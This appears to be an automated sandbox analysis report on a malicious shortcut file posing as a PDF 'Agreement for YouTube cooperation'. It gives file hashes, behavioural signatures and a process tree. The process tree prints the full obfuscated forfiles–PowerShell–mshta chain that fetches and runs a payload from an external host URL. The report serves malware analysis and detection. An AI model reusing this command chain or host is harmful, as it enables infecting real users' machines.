Analysis
-
max time kernel
136s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 17:34
Static task
static1
Behavioral task
behavioral1
Sample
A/3rd_cc_form_Oct_2024.pdf.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
A/3rd_cc_form_Oct_2024.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
A/Agreement for YouTube cooperation.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
A/Agreement for YouTube cooperation.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
A/Instruction_1928.pdf.lnk
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
A/Instruction_1928.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
A/Agreement for YouTube cooperation.pdf.lnk
-
Size
1KB
-
MD5
90de1044962e092ea916ae08649227ba
-
SHA1
a2fafd3d9e2b224205d6a3ae529416d33be68b2e
-
SHA256
8ea35c2bfdf4cad1197abadd19f4f0e09579afcfdb32abc7e71bb5818c6d3ba6
-
SHA512
1b2d37a8615904f074def78a06dbed15d38dc455eb5a715002a5e93c28520154f506d7ea6f150e915ca1bda0564d358635314e9022a170efee2ada168ff19890
Malware Config
Extracted
https://ctu.timeless-tales.shop/api/uz/0912545164/CharcoalWharf.json
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 9 228 mshta.exe 11 228 mshta.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation cmd.exe -
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 1852 powershell.exe 1852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1852 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exeforfiles.exepowershell.exedescription pid Process procid_target PID 4548 wrote to memory of 3172 4548 cmd.exe 85 PID 4548 wrote to memory of 3172 4548 cmd.exe 85 PID 3172 wrote to memory of 1852 3172 forfiles.exe 86 PID 3172 wrote to memory of 1852 3172 forfiles.exe 86 PID 1852 wrote to memory of 228 1852 powershell.exe 87 PID 1852 wrote to memory of 228 1852 powershell.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\A\Agreement for YouTube cooperation.pdf.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m notep*.exe /c "powershell Start-Process \*i*\*2\msh*e https://ctu.timeless-tales.shop/api/uz/0912545164/CharcoalWharf.json"2⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeStart-Process \*i*\*2\msh*e https://ctu.timeless-tales.shop/api/uz/0912545164/CharcoalWharf.json3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://ctu.timeless-tales.shop/api/uz/0912545164/CharcoalWharf.json4⤵
- Blocklisted process makes network request
PID:228
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82